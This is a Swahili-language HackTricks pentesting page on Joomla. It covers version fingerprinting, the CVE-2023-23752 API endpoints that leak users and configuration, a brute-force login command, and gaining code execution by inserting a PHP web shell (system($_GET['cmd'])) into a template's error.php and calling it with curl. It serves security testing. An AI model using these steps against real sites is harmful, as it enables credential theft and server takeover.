Swahili - Ht
HackTricks Training Twitter Linkedin Sponsor

Joomla

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Takwimu za Joomla

Joomla inakusanya baadhi ya takwimu za matumizi kama vile uchambuzi wa toleo la Joomla, PHP na database na mifumo ya uendeshaji wa seva inayotumiwa kwenye ufungaji wa Joomla. Data hii inaweza kuulizwa kupitia API yao ya umma.

curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool

{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.33,
"3.2": 0.01,
"3.3": 0.02,
"3.4": 0.05,
"3.5": 12.24,
"3.6": 22.85,
"3.7": 7.99,
"3.8": 17.72,
"3.9": 27.24,
"4.0": 3.21,
"4.1": 1.53,
"4.2": 0.82,
"4.3": 0,
"5.0": 0
},
"total": 2951032
}
}

Uthibitisho

Kugundua/Kuweka Alama za Miguu

  • Angalia meta

curl https://www.joomla.org/ | grep Joomla | grep generator

<meta name="generator" content="Joomla! - Open Source Content Management" />

  • robots.txt

# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]

  • README.txt

1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
* Joomla! Official site: https://www.joomla.org
* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging

Toleo

  • Katika /administrator/manifests/files/joomla.xml unaweza kuona toleo.

  • Katika /language/en-GB/en-GB.xml unaweza kupata toleo la Joomla.

  • Katika plugins/system/cache/cache.xml unaweza kuona toleo la karibu.

droopescan scan joomla --url http://joomla-site.local/

API Unauthenticated Information Disclosure:

Toleo kutoka 4.0.0 hadi 4.2.7 lina hatari ya kufichua habari bila kuthibitishwa (CVE-2023-23752) ambayo itadumpa creds na habari nyingine.

  • Watumiaji: http://<host>/api/v1/users?public=true

  • Faili ya Config: http://<host>/api/index.php/v1/config/application?public=true

Moduli wa MSF: scanner/http/joomla_api_improper_access_checks au skripti ya ruby: 51334

Brute-Force

Unaweza kutumia skripti hii kujaribu kufanya nguvu ya kuingia.

sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

admin:admin

RCE

Ikiwa umefanikiwa kupata mameneja wa admin, unaweza RCE ndani yake kwa kuongeza kipande cha mimbo ya PHP ili kupata RCE. Tunaweza kufanya hivi kwa kubinafsisha template.

  1. Bonyeza kwenye Templates chini kushoto chini ya Configuration ili kupata menyu ya templates.

  2. Bonyeza kwenye jina la template. Tuchague protostar chini ya kichwa cha safu ya Template. Hii itatupeleka kwenye ukurasa wa Templates: Customise.

  3. Hatimaye, unaweza bonyeza kwenye ukurasa ili kupata chanzo cha ukurasa. Tuchague ukurasa wa error.php. Tutaweka PHP one-liner ili kupata utekelezaji wa kodi kama ifuatavyo:

  4. system($_GET['cmd']);

  5. Hifadhi & Funga

  6. curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id

PreviousJIRANextJSP

Last updated